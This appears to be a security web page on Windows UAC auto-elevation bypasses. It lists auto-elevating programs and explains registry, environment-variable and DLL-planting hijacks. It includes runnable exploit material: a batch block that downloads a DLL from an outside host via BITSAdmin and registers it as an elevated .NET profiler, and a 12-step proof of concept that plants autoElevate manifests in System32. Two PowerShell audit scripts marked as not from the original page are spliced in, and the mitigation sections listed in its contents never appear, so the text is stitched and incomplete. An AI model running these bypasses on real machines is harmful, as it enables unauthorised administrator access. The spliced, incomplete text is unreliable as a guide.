
Me, myself & IT

Mitigate some Exploits for Windows’ UAC

Purpose
Background Information
Reason
Details
Auto-elevating Applications
Vulnerabilities
Vulnerabilities of CompMgmtLauncher.exe
Vulnerability of EventVwr.exe
Vulnerability of MMC.exe (.NET Framework Profiler)
Vulnerability of MMC.exe (HTML Help)
Vulnerability of Shortcuts in the Start Menu
Blended Vulnerabilities
Proof of Concept
Blended Vulnerabilities (Continued)
Blended Vulnerabilities (Finished)
Compound Vulnerabilities
MSRC Case 39303
MSRC Case 64957
Mitigations
Mitigation against Exploitation of CompMgmtLauncher.exe
Mitigation against Exploitation of EventVwr.exe
Mitigations against Exploitation of .NET Framework Profiler
Mitigations against Exploitation of HTML Help
Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu
Mitigation against Exploitation of WUSA.exe
Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe
Mitigations against Exploitation of Compound Vulnerabilities
Alternative Mitigation
Installation
Update
Deinstallation
Trivia

Purpose

Mitigate some exploits for vulnerabilities introduced with Windows 7 by the auto-elevation (mis)feature of the braindead security theatre known as User Account Control:

Note: qUACkery is another adequate name for this abomination!

Reason

As shipped by Microsoft®, all versions of Windows NT are unsafe: Windows is still set up without strict privilege separation, i.e. without separate accounts for (unprivileged) user(s) and (privileged) administrator(s)!

The TechNet article What's New in User Account Control states for example:

Because UAC requires an administrator to approve application installations, unauthorized applications cannot be installed automatically or without the explicit consent of an administrator.
This statement is plainly wrong: due to the changes introduced with Windows 7, unauthorised applications can be executed (and installed) automatically, without the explicit consent of an administrator!

Also see Mark Russinovich’s TechNet magazine articles Inside Windows Vista User Account Control and Inside Windows 7 User Account Control.

Background Information

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).
[Screen shot of default 'User Account Control Settings' from Windows 7] Windows Vista® introduced the security feature (really: security theatre) User Account Control: programs which need or want to be run with administrative privileges and access rights have to ask the user for consent.

This made some (really: a minority of) users quite angry: although these (rather braindead) users continued to abuse the (privileged) protected administrator account created during Windows Setup for their daily work (instead of following best practice and using an unprivileged limited alias standard user account), they had to answer a prompt whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened the security feature: Windows 7 introduced auto-elevation and enabled it for about 63 programs shipped with Windows 7 and later versions (listed below), which no longer prompt for consent.

Due to flaws in the design and deficiencies in the implementation of User Account Control, it can be bypassed trivially in numerous ways while its auto-elevation (mis)feature is enabled. As a result, arbitrary programs can be run with administrative privileges and access rights without prompting the user for consent.
To defeat some of these trivial bypasses, auto-elevation must be disabled by moving the slider of the User Account Control setting to its highest position titled Always notify, as documented and shown in the MSKB articles 975787 and 4462938.

Details

Auto-elevation is granted only to applications which carry an embedded application manifest with the autoElevate element set to true, are signed with Microsoft’s Windows publisher certificate and are located in a trusted directory like %SystemRoot%\System32\. As documented and shown in the MSKB articles 975787 and 4462938, it is performed for the applications listed below unless the slider of the User Account Control setting is at its highest position titled Always notify; its default position is Notify me only when programs try to make changes to my computer.
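The slider position is nothing but a pair of registry values under the machine’s UAC policy key. The following PowerShell script is an added example and not part of the original page: it reads those values, maps them back to the slider positions of the dialog shown above and reports whether auto-elevation is currently in effect; a second function moves the slider to Always notify by writing exactly the two values the dialog writes. The key and value names are Microsoft’s (they are the ones behind the Group Policy User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode); the function names are this example’s own.

```powershell
# Added example (not from the original page): map the UAC slider to the registry values
# behind it. Key and value names are Microsoft's; the function names are this example's own.
$UacPolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacSliderState {
    # Reading works with standard user rights.
    $p      = Get-ItemProperty -LiteralPath $UacPolicyKey
    $lua    = [int]$p.EnableLUA                    # 0: UAC off altogether (takes effect after reboot)
    $admin  = [int]$p.ConsentPromptBehaviorAdmin   # 2: prompt for consent, 5: prompt for non-Windows binaries only, 0: elevate silently
    $secure = [int]$p.PromptOnSecureDesktop        # 1: prompt on the secure desktop (dimmed), 0: on the user's desktop

    # The four slider positions of the dialog correspond to these value pairs.
    if ($lua -eq 0) {
        $slider = 'Never notify (EnableLUA=0, UAC switched off)'; $auto = $null
    } elseif ($admin -eq 2 -and $secure -eq 1) {
        $slider = 'Always notify'; $auto = $false
    } elseif ($admin -eq 5 -and $secure -eq 1) {
        $slider = 'Notify me only when programs try to make changes to my computer (default)'; $auto = $true
    } elseif ($admin -eq 5 -and $secure -eq 0) {
        $slider = 'Notify me only when programs try to make changes to my computer (do not dim my desktop)'; $auto = $true
    } elseif ($admin -eq 0) {
        $slider = 'Never notify (elevate without prompting)'; $auto = $true
    } else {
        $slider = 'Group Policy combination not reachable via the slider'; $auto = $null
    }

    [pscustomobject]@{
        EnableLUA                  = $lua
        ConsentPromptBehaviorAdmin = $admin
        PromptOnSecureDesktop      = $secure
        Slider                     = $slider
        AutoElevationActive        = $auto    # $true: the applications listed below elevate without a prompt
    }
}

function Set-UacAlwaysNotify {
    # Writes to HKLM, so run this from an elevated shell. It changes exactly the two
    # values the slider's top position changes; unlike EnableLUA they need no reboot.
    Set-ItemProperty -LiteralPath $UacPolicyKey -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -LiteralPath $UacPolicyKey -Name PromptOnSecureDesktop      -Value 1 -Type DWord
}

Get-UacSliderState
```

Run Get-UacSliderState unelevated to audit a machine; AutoElevationActive is $true on every standard installation until Set-UacAlwaysNotify (or the slider, or Group Policy) has been applied.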

Auto-elevating Applications

Windows 7 SP1, x64 alias AMD64 Processor Architecture

Auto-elevating executables (64-bit and 32-bit builds)
AdapterTroubleshooter.exe
BitLockerWizardElev.exe
bthudtask.exe
chkntfs.exe
cleanmgr.exe
cliconfg.exe
CompMgmtLauncher.exe
ComputerDefaults.exe
dccw.exe
dcomcnfg.exe
DeviceEject.exe
DeviceProperties.exe
dfrgui.exe
djoin.exe
eudcedit.exe
eventvwr.exe
fsquirt.exe
FXSUNATD.exe
hdwwiz.exe
ieUnatt.exe
iscsicli.exe
iscsicpl.exe
lpksetup.exe
Mcx2Prov.exe
MdSched.exe
msconfig.exe
msdt.exe
msra.exe
MultiDigiMon.exe
Netplwiz.exe
newdev.exe
ntprint.exe
ocsetup.exe
odbcad32.exe
OptionalFeatures.exe
PDMSetup.exe
perfmon.exe
printui.exe
rdpshell.exe
recdisc.exe
rrinstaller.exe
rstrui.exe
sdbinst.exe
sdclt.exe
setupsqm.exe
shrpubw.exe
slui.exe
SndVol.exe
sysprep.exe
SystemPropertiesAdvanced.exe
SystemPropertiesComputerName.exe
SystemPropertiesDataExecutionPrevention.exe
SystemPropertiesHardware.exe
SystemPropertiesPerformance.exe
SystemPropertiesProtection.exe
SystemPropertiesRemote.exe
taskmgr.exe
tcmsetup.exe
TpmInit.exe
verifier.exe
WindowsAnytimeUpgrade.exe
wisptis.exe
wusa.exe

Windows 10 2004 and Windows 10 20H2, x64 alias AMD64 Processor Architecture

Auto-elevating executables (64-bit and 32-bit builds)
BitLockerWizardElev.exe
bthudtask.exe
changepk.exe
cleanmgr.exe
ComputerDefaults.exe
dccw.exe
dcomcnfg.exe
DeviceEject.exe
DeviceProperties.exe
dfrgui.exe
djoin.exe
easinvoker.exe
EASPolicyManagerBrokerHost.exe
eudcedit.exe
eventvwr.exe
fodhelper.exe
fsavailux.exe
fsquirt.exe
FXSUNATD.exe
immersivetpmvscmgrsvr.exe
iscsicli.exe
iscsicpl.exe
lpksetup.exe
MdSched.exe
MSchedExe.exe
msconfig.exe
msdt.exe
msra.exe
MultiDigiMon.exe
Netplwiz.exe
newdev.exe
odbcad32.exe
OptionalFeatures.exe
PasswordOnWakeSettingFlyout.exe
perfmon.exe
printui.exe
rdpshell.exe
recdisc.exe
rrinstaller.exe
rstrui.exe
sdclt.exe
shrpubw.exe
slui.exe
SndVol.exe
SystemPropertiesAdvanced.exe
SystemPropertiesComputerName.exe
SystemPropertiesDataExecutionPrevention.exe
SystemPropertiesHardware.exe
SystemPropertiesPerformance.exe
SystemPropertiesProtection.exe
SystemPropertiesRemote.exe
systemreset.exe
SystemSettingsAdminFlows.exe
SystemSettingsRemoveDevice.exe
Taskmgr.exe
tcmsetup.exe
TpmInit.exe
WindowsUpdateElevatedInstaller.exe
WSReset.exe
wusa.exe

Vulnerabilities

The following vulnerabilities can be exploited in standard installations of Windows 7 and newer versions of Windows NT, without user interaction!

Note: only vulnerabilities and exploits for which a mitigation exists are presented here, together with their mitigation!

Vulnerabilities of CompMgmtLauncher.exe

The superfluous application Computer Management Snapin Launcher CompMgmtLauncher.exe is used to start the Computer Management snap-in CompMgmt.msc of the Microsoft Management Console; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" launches Computer Management directly, and MMC.exe has auto-elevation enabled too.

CompMgmtLauncher.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" it launches the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk alias %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.

An unprivileged user can set the environment variable ALLUSERSPROFILE to the pathname of an arbitrary directory under his control, create the subdirectory Microsoft\Windows\Start Menu\Programs\Administrative Tools\ there and then create the shortcut Computer Management.lnk specifying an arbitrary (rogue) command line in this subdirectory.
In standard installations of Windows 7 and newer versions of Windows NT, CompMgmtLauncher.exe launches this command line without UAC prompt with administrative privileges and access rights.

Note: because the command line %SystemRoot%\System32\CompMgmt.msc of the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk specifies no executable file, CompMgmtLauncher.exe exhibits the (following) vulnerability of EventVwr.exe too.

Vulnerability of EventVwr.exe

The superfluous application Event Viewer Snapin Launcher EventVwr.exe is used to start the Event Viewer snap-in EventVwr.msc of the MMC.exe; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" launches Event Viewer directly, and MMC.exe has auto-elevation enabled too.

Note: EventVwr.exe exists for backward compatibility with Windows NT4 and earlier versions of Windows NT only; in Windows 2000 the standalone Event Viewer application was replaced by the snap-in EventVwr.msc.

EventVwr.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" it calls the Win32 function ShellExecute() to launch EventVwr.msc; to evaluate the command line to execute, ShellExecute() reads the (unnamed) default values of the Registry keys HKEY_CLASSES_ROOT\.msc and HKEY_CLASSES_ROOT\mscfile\Shell\Open\Command.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Classes with the Registry branch HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\mscfile\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value, or create the Registry key HKEY_CURRENT_USER\Software\Classes\.msc and write an arbitrary (rogue) Programmatic Identifier (uacamole for example) to its (unnamed) default value, then create the Registry key HKEY_CURRENT_USER\Software\Classes\uacamole\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 7 and newer versions of Windows NT, EventVwr.exe launches this command line without UAC prompt with administrative privileges and access rights.

Vulnerability of MMC.exe (.NET Framework Profiler)

Multiple snap-ins of the Microsoft Management Console are implemented using the .NET Framework.

When the .NET Framework is loaded, its Common Language Runtime execution engine evaluates the environment variables COR_ENABLE_PROFILING and COR_PROFILER (since .NET Framework 4 additionally COR_PROFILER_PATH) and loads the COM object they specify as code profiler:

When both environment variable checks pass, the CLR creates an instance of the profiler in a similar manner to the COM CoCreateInstance function. The profiler is not loaded through a direct call to CoCreateInstance. Therefore, a call to CoInitialize, which requires setting the threading model, is avoided.
The CLR execution engine, however, fails to implement the security checks added to the Win32 function CoCreateInstance() in Windows Vista®:
The Component Object Model (COM) leverages the registry to maintain information about all of the COM objects installed on a computer. This registry hive (HKEY_CLASSES_ROOT) is a virtual registry hive, which allows for both per-user and per-machine object registration. Per-user COM objects configurations are stored in HKEY_CURRENT_USER\Software\Classes, while per-machine configurations are stored in HKEY_LOCAL_MACHINE\Software\Classes. Typically, per-user configurations take precedence.

Beginning with Windows Vista® and Windows Server® 2008, if the integrity level of a process is higher than Medium, the COM runtime ignores per-user COM configuration and accesses only per-machine COM configuration. This action reduces the surface area for elevation of privilege attacks, preventing a process with standard user privileges from configuring a COM object with arbitrary code and having this code called from an elevated process.

An unprivileged user can set the environment variables and create the Registry keys and entries below HKEY_CURRENT_USER\Software\Classes\CLSID to register an arbitrary (rogue) DLL as COM object.

In standard installations of Windows 7 and newer versions of Windows NT, MMC.exe loads this DLL without UAC prompt with administrative privileges and access rights.

Note: this vulnerability allows arbitrary code execution in every application which uses .NET Framework!

Start the Command Processor under the (protected) administrator account created during Windows Setup and run the following (block of) command lines:

REM Copyright © 2017-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER UACaMole /DOWNLOAD /PRIORITY FOREGROUND https://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:*.DLL "%TMP%"
SET COR_ENABLE_PROFILING=1
SET COR_PROFILER={32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
REM SET COR_PROFILER_PATH=%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL
IF NOT "%PROCESSOR_ARCHITECTURE%" == "x86" (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /V ThreadingModel /T REG_SZ /D Apartment /F
) ELSE (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
)
START EventVwr.msc

Vulnerability of MMC.exe (HTML Help)

The help function of the Microsoft Management Console is implemented with HTML Help: when the F1 key is pressed, MMC.exe calls HHCtrl.ocx, which in turn loads an arbitrary (rogue) DLL registered by the unprivileged user with the following Registry entry:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author]
"Location"="‹path›\\‹filename›.‹extension›"
In standard installations of Windows Vista and newer versions of Windows NT, ‹path›\‹filename›.‹extension› is loaded and executed with administrative privileges and access rights.

Note: this undocumented feature allows arbitrary code execution in every application which uses HTML Help!

Vulnerability of Shortcuts in the Start Menu

The shortcuts for all snap-ins of the Microsoft Management Console in the directories %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ and %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ show the same vulnerability as EventVwr.exe: Windows Explorer resolves their command lines %SystemRoot%\System32\‹filename›.msc through the .msc and mscfile entries of HKEY_CLASSES_ROOT just like the Win32 function ShellExecute() does, so the per-user Registry keys described above take effect here too.

Blended Vulnerabilities

WUSA.exe, the Windows Update Standalone Installer, is yet another of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.
Its /Extract:‹destination› command-line switch (no longer available in Windows 10) allows the contents of an arbitrary cabinet archive to be extracted into an arbitrary destination directory. Because WUSA.exe runs elevated, this feature can be (ab)used to plant DLLs which other auto-elevating applications load and execute, and thereby to gain administrative privileges and access rights:
MMC.exe

The Event Viewer snap-in EventVwr.msc of the Microsoft Management Console MMC.exe loads and executes ELS.dll, which in turn loads and executes ELSExt.dll; because ELSExt.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

CliConfg.exe

The SQL Client Configuration Utility CliConfg.exe has auto-elevation enabled too.
It loads and executes NTWDBLib.dll; because NTWDBLib.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

SysPrep.exe

The System Preparation Utility SysPrep.exe has auto-elevation enabled too.
In Windows 7 and Windows Server 2008 R2, it loads and executes CryptBase.dll, CryptSP.dll, DWMAPI.dll, RPCRtRemote.dll and UXTheme.dll; because these DLLs don’t exist in its application directory %SystemRoot%\System32\SysPrep\, arbitrary (rogue) DLLs with these filenames can be planted there, from where they are then loaded and executed with administrative privileges and access rights.

SetupSQM.exe

The Setup SQM Tool SetupSQM.exe has auto-elevation enabled too.
It loads and executes WDSCore.dll; because WDSCore.dll does not exist in its application directory %SystemRoot%\System32\OoBE\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

MCX2Prov.exe

The MCX2 Provisioning Library MCX2Prov.exe has auto-elevation enabled too.
In Windows 7 it loads and executes CryptBase.dll; because CryptBase.dll does not exist in its application directory %SystemRoot%\eHome\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

PkgMgr.exe

The Windows Package Manager PkgMgr.exe has auto-elevation enabled too.
It calls DISMHost.exe to perform some of its tasks, which loads and executes PEProvider.dll; because PEProvider.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in its application directory %SystemRoot%\System32\DISM\, from where it is then loaded and executed with administrative privileges and access rights.

MSHTA.exe, CScript.exe and WScript.exe

In Windows 7 and Windows Server 2008 R2, the applications Microsoft HTML Application Host MSHTA.exe, Console Based Script Host CScript.exe and Windows Based Script Host WScript.exe are shipped without embedded Application Manifest.
Windows’ module loader therefore evaluates external (rogue) application manifests MSHTA.exe.manifest, CScript.exe.manifest and WScript.exe.manifest planted in the system directory %SystemRoot%\System32\. These application manifests can enable auto-elevation, resulting in execution of every HTML Application *.hta, every JScript *.js or *.jse, every VBScript *.vbs or *.vbe, as well as every other script *.wsf or *.wsh for the Windows Script Host with administrative privileges and access rights.

Proof of Concept

Perform the following 12 simple steps to demonstrate an exploit of the last vulnerability.
  1. Logon to the UAC-controlled user account created during the setup of Windows 7 and start the Command Processor Cmd.exe unelevated.

  2. Create the text file UACAMOLE.XML with the following content in your TMP directory:

    <?xml version='1.0' encoding='UTF-8' standalone='yes' ?>
    <assembly manifestVersion='1.0' xmlns='urn:schemas-microsoft-com:asm.v1'>
        <application xmlns='urn:schemas-microsoft-com:asm.v3'>
            <windowsSettings xmlns='http://schemas.microsoft.com/SMI/2005/WindowsSettings'>
                <autoElevate>true</autoElevate>
            </windowsSettings>
        </application>
        <compatibility xmlns='urn:schemas-microsoft-com:compatibility.v1'>
            <application>
                <supportedOS Id='{35138b9a-5d96-4fbd-8e2d-a2440225f93a}' />
            </application>
        </compatibility>
        <trustInfo xmlns='urn:schemas-microsoft-com:asm.v2'>
            <security>
                <requestedPrivileges>
                    <requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
                </requestedPrivileges>
            </security>
        </trustInfo>
    </assembly>
  3. Create the text file UACAMOLE.DDF with the following content in your TMP directory:

    UACAMOLE.XML CScript.exe.manifest
    UACAMOLE.XML MSHTA.exe.manifest
    UACAMOLE.XML WScript.exe.manifest
  4. Run the following command line to create the cabinet file UACAMOLE.CAB in your TMP directory:

    MAKECAB.EXE /D CabinetNameTemplate=UACAMOLE.CAB /D DiskDirectoryTemplate="%TMP%" /D InfFileName=NUL: /D RptFileName=NUL: /F "%TMP%\UACAMOLE.DDF"
  5. Run the following command line to extract the cabinet file UACAMOLE.CAB into the system directory %SystemRoot%\System32\:

    WUSA.EXE "%TMP%\UACAMOLE.CAB" /EXTRACT:"%SystemRoot%\System32"
  6. Verify that the application manifest files CScript.exe.manifest, MSHTA.exe.manifest and WScript.exe.manifest have been created in the system directory %SystemRoot%\System32\:

    DIR "%SystemRoot%\System32\*.exe.manifest"
     Volume in drive C has no label.
     Volume Serial Number is 1957-0427
    
     Directory of C:\Windows\System32
    
    04/27/2011  08:15 PM               859 CScript.exe.manifest
    04/27/2011  08:15 PM               859 MSHTA.exe.manifest
    04/27/2011  08:15 PM               859 WScript.exe.manifest
                   3 File(s)           2577 bytes
                   0 Dir(s)    9,876,543,210 bytes free
  7. Create the text file UACAMOLE.HTA with the following content in your TMP directory, then execute it per double-click and close its window:

    <HTML>
        <HEAD>
            <HTA:APPLICATION />
            <SCRIPT LANGUAGE="VBScript" TYPE="text/vbscript">
                With CreateObject("Scripting.FileSystemObject")
                    .DeleteFile .BuildPath(.GetSpecialFolder(1), "MSHTA.exe.manifest")
                End With
            </SCRIPT>
        </HEAD>
    </HTML>
  8. Create the text file UACAMOLE.JS with the following content in your TMP directory:

    new ActiveXObject('Scripting.FileSystemObject').DeleteFile(WScript.FullName + '.manifest');
  9. Run the following command line to execute the JScript file %TMP%\UACAMOLE.JS created in step 8. with the Console Based Script Host CScript.exe:

    CSCRIPT.EXE "%TMP%\UACAMOLE.JS"
    Microsoft (R) Windows Script Host, Version 5.8
    Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
  10. Create the text file UACAMOLE.VBS with the following content in your TMP directory and execute it per double-click:

    WScript.CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.FullName & ".manifest")
  11. Verify that the application manifest files CScript.exe.manifest, MSHTA.exe.manifest and WScript.exe.manifest have been erased from the system directory %SystemRoot%\System32\, i.e. that the Console Based Script Host CScript.exe, the Microsoft HTML Application Host MSHTA.exe and the Windows Based Script Host WScript.exe ran auto-elevated with administrative privileges and access rights:

    DIR "%SystemRoot%\System32\*.exe.manifest"
     Volume in drive C has no label.
     Volume Serial Number is 1957-0427
    
     Directory of C:\Windows\System32
    
    File Not Found
  12. Finally cleanup and exit the Command Processor:

    ERASE "%TMP%\UACAMOLE.*"
    EXIT

Blended Vulnerabilities (Continued)

The Diagnostics Troubleshooting Wizard MSDT.exe performs auto-elevation. Its satellites, including various DLLs, are installed in multiple subdirectories %SystemRoot%\Diagnostics\Index\*\ and %SystemRoot%\Diagnostics\System\*\. Running elevated, MSDT.exe launches the Scripted Diagnostics Native Host SDiagNHost.exe which loads and executes these DLLs.
On 64-bit installations of Windows, most of them are built for the 64-bit execution environment and some of them for the 32-bit execution environment, i.e. for each of these DLLs the build for the other execution environment is missing!

When searching the PATH for a DLL, Windows’ module loader skips DLLs built for execution environments other than that of the running process. An unprivileged user can build the missing DLLs and place them in an arbitrary directory of the search path, for example the directory %LOCALAPPDATA%\Microsoft\WindowsApps\ alias %USERPROFILE%\AppData\Local\Microsoft\WindowsApps\ introduced with Windows 8.

Note: the (tail of the) search path is controlled by the unprivileged user who can append arbitrary directory names to the user environment variable PATH!

In standard installations of Windows 7 and newer versions of Windows NT, MSDT.exe loads and executes these DLLs indirectly via SDiagNHost.exe, without UAC prompt, with administrative privileges and access rights.

Note: this bypass was also found independently and published as MSDT DLL Hijack UAC bypass.

Blended Vulnerabilities (Finished)

Since Windows 8, the Microsoft® Windows Backup command line tool SDCLT.exe performs auto-elevation. Running elevated it launches the Windows Control Panel Control.exe, which calls ShellExecute() to open a folder.

ShellExecute() reads the (unnamed) default value of the Registry key HKEY_CLASSES_ROOT\Folder\Shell\Open\Command and executes the command line found there.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branches HKEY_LOCAL_MACHINE\SOFTWARE\Classes and HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\Folder\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 8 and newer versions of Windows NT, SDCLT.exe launches this command line indirectly via Control.exe, without UAC prompt, with administrative privileges and access rights.

Note: this bypass was also found independently and published as Yet another sdclt UAC bypass.
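All of the bypasses above that do not need a planted DLL share one trait: the unprivileged user prepares them in places only he controls, namely HKEY_CURRENT_USER\Software\Classes (EventVwr.exe, CompMgmtLauncher.exe, the Start Menu shortcuts, SDCLT.exe), his environment (ALLUSERSPROFILE for CompMgmtLauncher.exe, COR_* for the .NET Framework profiler, the user part of PATH for MSDT.exe) and HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author. The following PowerShell script is an added example and not part of the original page: a read-only audit that walks exactly those hijack points and reports anything set, so a defender can inspect an account (or a baseline image) for the preparations these bypasses need. The registry paths, value names and environment variables are the ones named in the text; the function names are this example’s own, and it assumes PowerShell 3.0 or later.

```powershell
# Added example (not from the original page): read-only audit of the per-user hijack points
# described above. Run it UNELEVATED in the account to inspect; it changes nothing.
# Registry paths, value names and environment variables are those named in the text;
# the function names are this example's own. Requires PowerShell 3.0 or later.

function Get-DefaultValue([string]$Key) {
    # The unnamed default value of a key shows up as the '(default)' property.
    (Get-ItemProperty -LiteralPath $Key -ErrorAction SilentlyContinue).'(default)'
}

function New-Hit([string]$Where, [string]$What, [string]$Affects) {
    [pscustomobject]@{ Where = $Where; What = $What; Affects = $Affects }
}

function Get-UacHijackIndicators {
    $classes = 'HKCU:\Software\Classes'

    # 1. .msc handler: EventVwr.exe, CompMgmtLauncher.exe and the Start Menu shortcuts go through
    #    ShellExecute(), i.e. HKCR\.msc and HKCR\mscfile, which HKCU\Software\Classes overlays.
    $k = "$classes\mscfile\shell\open\command"
    if (Test-Path -LiteralPath $k) { New-Hit $k (Get-DefaultValue $k) 'EventVwr.exe, CompMgmtLauncher.exe, *.msc shortcuts' }
    $k = "$classes\.msc"
    if (Test-Path -LiteralPath $k) {
        $progId = Get-DefaultValue $k
        New-Hit $k "ProgId '$progId'" '.msc redirected to a per-user ProgId'
        $k = "$classes\$progId\shell\open\command"
        if ($progId -and (Test-Path -LiteralPath $k)) { New-Hit $k (Get-DefaultValue $k) 'EventVwr.exe, CompMgmtLauncher.exe, *.msc shortcuts' }
    }

    # 2. Folder handler: SDCLT.exe -> Control.exe -> ShellExecute() on a folder.
    $k = "$classes\Folder\shell\open\command"
    if (Test-Path -LiteralPath $k) { New-Hit $k (Get-DefaultValue $k) 'SDCLT.exe via Control.exe' }

    # 3. CompMgmtLauncher.exe follows %ALLUSERSPROFILE%\...\Computer Management.lnk; compare the
    #    variable with the machine-wide ProgramData path recorded in the ProfileList key.
    $expected = (Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList').ProgramData
    if ($expected -and $env:ALLUSERSPROFILE -and $env:ALLUSERSPROFILE.TrimEnd('\') -ne $expected.TrimEnd('\')) {
        New-Hit 'ALLUSERSPROFILE' $env:ALLUSERSPROFILE "CompMgmtLauncher.exe (machine value: $expected)"
    }

    # 4. HTML Help: HHCtrl.ocx loads the file named here in every process that shows help.
    $k = 'HKCU:\Software\Microsoft\HtmlHelp Author'
    $loc = (Get-ItemProperty -LiteralPath $k -ErrorAction SilentlyContinue).Location
    if ($loc) { New-Hit "$k\Location" $loc 'MMC.exe (F1) and every other HTML Help client' }

    # 5. CLR profiler: COR_* variables (persistent user scope, then the current process) plus the
    #    matching per-user CLSID registration in both registry views.
    $seen = ''
    foreach ($scope in 'User', 'Process') {
        $on    = [Environment]::GetEnvironmentVariable('COR_ENABLE_PROFILING', $scope)
        $clsid = [Environment]::GetEnvironmentVariable('COR_PROFILER', $scope)
        $path  = [Environment]::GetEnvironmentVariable('COR_PROFILER_PATH', $scope)
        $combo = "$on|$clsid|$path"
        if ($combo -eq '||' -or $combo -eq $seen) { continue }   # unset, or already reported from user scope
        $seen = $combo
        New-Hit "COR_* ($scope)" "COR_ENABLE_PROFILING=$on COR_PROFILER=$clsid COR_PROFILER_PATH=$path" 'MMC.exe and every .NET Framework process'
        foreach ($view in 'CLSID', 'Wow6432Node\CLSID') {
            $k = "$classes\$view\$clsid\InProcServer32"
            if ($clsid -and (Test-Path -LiteralPath $k)) { New-Hit $k (Get-DefaultValue $k) 'profiler DLL registered per user' }
        }
    }

    # 6. MSDT.exe -> SDiagNHost.exe searches the PATH for the missing DLLs; the user controls the
    #    user-scope tail of PATH. Report entries the user can create files in (probe is deleted on close).
    $userPath = [Environment]::GetEnvironmentVariable('PATH', 'User')
    foreach ($dir in @($userPath -split ';' | Where-Object { $_ })) {
        $full = [Environment]::ExpandEnvironmentVariables($dir)
        if (-not (Test-Path -LiteralPath $full -PathType Container)) { continue }
        $probe = Join-Path $full ('probe-' + [guid]::NewGuid().ToString('N'))
        try {
            [IO.File]::Create($probe, 1, [IO.FileOptions]::DeleteOnClose).Dispose()
            New-Hit 'PATH (User)' $full 'SDiagNHost.exe DLL search order (user-writable PATH entry)'
        } catch { }
    }
}

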